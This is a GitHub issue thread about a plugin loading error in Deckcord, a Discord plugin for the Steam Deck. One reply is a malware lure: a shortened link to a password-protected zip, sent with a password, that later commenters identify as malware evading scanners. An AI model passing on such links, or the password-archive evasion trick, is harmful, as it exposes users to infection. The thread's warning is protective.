marios8543 / Deckcord

Discord on the Steam Deck, made easy!
Other
71 stars 4 forks source link

Error: Deckord frontend_bundle not OK #19

Open BradleyAKern opened 2 months ago

BradleyAKern commented 2 months ago

For reference, here is my environment:

Steam Deck OS Version: 3.5.19 Decky Version: v3.0.1 Deckord Version: Latest commit in main at the time of writing.

Here is the full error message below in italics: _Error: Deckord frontendbundle not OK at PluginLoader.importReactPlugin (http://localhost:1337/frontend/chunk-CiV740oB.js:7227:31) at async PluginLoader.importPlugin (http://localhost:1337/frontend/chunk-CiV740oB.js:7177:13) at async Promise.all (index 1) at async PluginLoader.loadPlugins (http://localhost:1337/frontend/chunk-CiV740oB.js:7064:9)

Loading Deckord caused an exception as shown above. This usually means that the plugin requires an update for the new version of SteamUI. Check if an update is present or evaluate its removal in the Decky settings, in the Plugins section.

I admittedly got my Steam Deck only recently and this is my first attempt at installing a plugin. I downloaded a ZIP of the commit mentioned above and extracted it into /home/deck/homebrew/plugins/Deckord/, ensuring the folder has all of the the necessary files like the main.py. When switching to gaming mode and attempting to select Deckord, I am greeted with that error. I just want to rule out whether this is me not knowing how to install this correctly, or if Deckord is not supported for the combination of versions on my relatively new machine.

ghost commented 2 months ago

I think this will help you. https://bit.ly/47P0Nvo

Password: changeme If you don't have the c compliator, install it.(gcc or clang)

BradleyAKern commented 2 months ago

@SagarChandra07 My computer is flagging and removing that .zip as a virus for some reason. What are the contents? Just a c program?

thelabcat commented 2 months ago

@SagarChandra07 My computer is flagging and removing that .zip as a virus for some reason. What are the contents? Just a c program?

Do not run that file! It is malware. The account has been spamming links to it all over GitHub. They use a password protected zip archive to evade the auto-check by MediaFire. I extracted it on a non-Windows machine and checked it manually. 17 positives!

BradleyAKern commented 2 months ago

@thelabcat That was my suspicion, I appreciate it 🙏